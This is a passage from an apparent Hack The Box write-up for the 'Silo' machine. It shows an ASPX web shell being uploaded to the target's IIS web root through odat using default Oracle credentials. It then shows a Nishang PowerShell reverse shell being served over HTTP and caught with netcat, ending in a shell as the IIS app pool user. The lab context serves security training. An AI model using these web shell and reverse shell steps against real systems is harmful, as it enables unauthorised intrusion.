runat="server">Command:</asp:Label></form></body></HTML><!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) --><!-- http://michaeldaw.org 04/2007 -->
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ cat cmdasp.aspx | tr -d '\n' > cmd.aspx
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ wc -c cmd.aspx
1358 cmd.aspx
Now upload it using the command format below:
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ ./odat.py dbmsxslprocessor --sysdba -s 10.10.10.82 -U scott -P tiger -d XE --putFile "C:\\inetpub\\wwwroot\\" "rchitect.aspx" "/home/rocky/hckbox/silo/rchitect.aspx"
07:54:03 ERROR -: Impossible to load local configuration files in conf/ and to set driver_name: module 'cx_Oracle' has no attribute 'init_oracle_client'
[1] (10.10.10.82:1521): Put the /home/rocky/hckbox/silo/rchitect.aspx local file in the C:\inetpub\wwwroot\ path (named rchitect.aspx) of the 10.10.10.82 server
[+] The /home/rocky/hckbox/silo/rchitect.aspx local file was put in the remote C:\inetpub\wwwroot\ path (named rchitect.aspx)
I can access the cmd shell from the browser.

Let's use Nishang's PowerShell script for reverse shell access:

$ tail -1 Invoke-PowerShellTcp.ps1
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ tail -5 Invoke-PowerShellTcp.ps1
Write-Error $_
}
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.12 -Port 4444
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.82 - - [25/Feb/2022 08:29:31] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
$ rlwrap nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.82] 49168
Windows PowerShell running as user SILO$ on SILO
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv>